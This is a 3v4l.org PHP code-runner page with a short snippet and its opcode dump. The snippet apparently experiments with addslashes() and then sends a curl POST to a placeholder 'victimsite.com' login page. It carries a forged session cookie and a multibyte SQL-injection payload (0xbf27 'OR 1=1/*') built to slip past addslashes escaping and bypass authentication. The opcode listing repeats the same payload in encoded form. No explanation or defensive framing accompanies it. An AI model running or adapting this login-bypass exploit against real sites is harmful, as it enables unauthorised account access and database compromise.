3v4l.org

run code in 300+ PHP versions simultaneously
<?php $a = array( //"one" => "'1", "one" => 0xbf5c27, "two" => 2, "three" => 3, "seventeen" => 17 ); foreach ($a as $k => $v) { echo "$v...\n"; //$str = $v; $str = addslashes($v); echo "\$a[$k] => $str.\n"; } $url = "http://www.victimsite.com/login.php"; $ref = "http://www.victimsite.com/index.php"; $session = "PHPSESSID=abcdef01234567890abcdef01"; $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url ); curl_setopt( $ch, CURLOPT_REFERER, $ref ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE ); curl_setopt( $ch, CURLOPT_COOKIE, $session ); curl_setopt( $ch, CURLOPT_POST, TRUE ); curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" . chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" ); $data = curl_exec( $ch ); print( $data ); curl_close( $ch ); ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 2, Position 2 = 18
Branch analysis from position: 2
2 jumps found. (Code = 78) Position 1 = 3, Position 2 = 18
Branch analysis from position: 3
1 jumps found. (Code = 42) Position 1 = 2
Branch analysis from position: 2
Branch analysis from position: 18
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 18
filename:       /in/6KjF4
function name:  (null)
number of ops:  70
compiled vars:  !0 = $a, !1 = $v, !2 = $k, !3 = $str, !4 = $url, !5 = $ref, !6 = $session, !7 = $ch, !8 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   ASSIGN                                                   !0, <array>
   11     1      > FE_RESET_R                                       $10     !0, ->18
          2    > > FE_FETCH_R                                       ~11     $10, !1, ->18
          3    >   ASSIGN                                                   !2, ~11
   12     4        NOP                                                      
          5        FAST_CONCAT                                      ~13     !1, '...%0A'
          6        ECHO                                                     ~13
   14     7        INIT_FCALL                                               'addslashes'
          8        SEND_VAR                                                 !1
          9        DO_ICALL                                         $14     
         10        ASSIGN                                                   !3, $14
   15    11        ROPE_INIT                                     5  ~17     '%24a%5B'
         12        ROPE_ADD                                      1  ~17     ~17, !2
         13        ROPE_ADD                                      2  ~17     ~17, '%5D+%3D%3E+'
         14        ROPE_ADD                                      3  ~17     ~17, !3
         15        ROPE_END                                      4  ~16     ~17, '.%0A'
         16        ECHO                                                     ~16
   11    17      > JMP                                                      ->2
         18    >   FE_FREE                                                  $10
   20    19        ASSIGN                                                   !4, 'http%3A%2F%2Fwww.victimsite.com%2Flogin.php'
   21    20        ASSIGN                                                   !5, 'http%3A%2F%2Fwww.victimsite.com%2Findex.php'
   22    21        ASSIGN                                                   !6, 'PHPSESSID%3Dabcdef01234567890abcdef01'
   24    22        INIT_FCALL_BY_NAME                                       'curl_init'
         23        DO_FCALL                                      0  $23     
         24        ASSIGN                                                   !7, $23
   26    25        INIT_FCALL_BY_NAME                                       'curl_setopt'
         26        SEND_VAR_EX                                              !7
         27        FETCH_CONSTANT                                   ~25     'CURLOPT_URL'
         28        SEND_VAL_EX                                              ~25
         29        SEND_VAR_EX                                              !4
         30        DO_FCALL                                      0          
   27    31        INIT_FCALL_BY_NAME                                       'curl_setopt'
         32        SEND_VAR_EX                                              !7
         33        FETCH_CONSTANT                                   ~27     'CURLOPT_REFERER'
         34        SEND_VAL_EX                                              ~27
         35        SEND_VAR_EX                                              !5
         36        DO_FCALL                                      0          
   28    37        INIT_FCALL_BY_NAME                                       'curl_setopt'
         38        SEND_VAR_EX                                              !7
         39        FETCH_CONSTANT                                   ~29     'CURLOPT_RETURNTRANSFER'
         40        SEND_VAL_EX                                              ~29
         41        SEND_VAL_EX                                              <true>
         42        DO_FCALL                                      0          
   29    43        INIT_FCALL_BY_NAME                                       'curl_setopt'
         44        SEND_VAR_EX                                              !7
         45        FETCH_CONSTANT                                   ~31     'CURLOPT_COOKIE'
         46        SEND_VAL_EX                                              ~31
         47        SEND_VAR_EX                                              !6
         48        DO_FCALL                                      0          
   30    49        INIT_FCALL_BY_NAME                                       'curl_setopt'
         50        SEND_VAR_EX                                              !7
         51        FETCH_CONSTANT                                   ~33     'CURLOPT_POST'
         52        SEND_VAL_EX                                              ~33
         53        SEND_VAL_EX                                              <true>
         54        DO_FCALL                                      0          
   31    55        INIT_FCALL_BY_NAME                                       'curl_setopt'
         56        SEND_VAR_EX                                              !7
         57        FETCH_CONSTANT                                   ~35     'CURLOPT_POSTFIELDS'
         58        SEND_VAL_EX                                              ~35
   33    59        SEND_VAL_EX                                              'username%3D%BF%27OR+1%3D1%2F%2A%26submit%3D1'
         60        DO_FCALL                                      0          
   35    61        INIT_FCALL_BY_NAME                                       'curl_exec'
         62        SEND_VAR_EX                                              !7
         63        DO_FCALL                                      0  $37     
         64        ASSIGN                                                   !8, $37
   37    65        ECHO                                                     !8
   38    66        INIT_FCALL_BY_NAME                                       'curl_close'
         67        SEND_VAR_EX                                              !7
         68        DO_FCALL                                      0          
   40    69      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
151.94 ms | 1400 KiB | 15 Q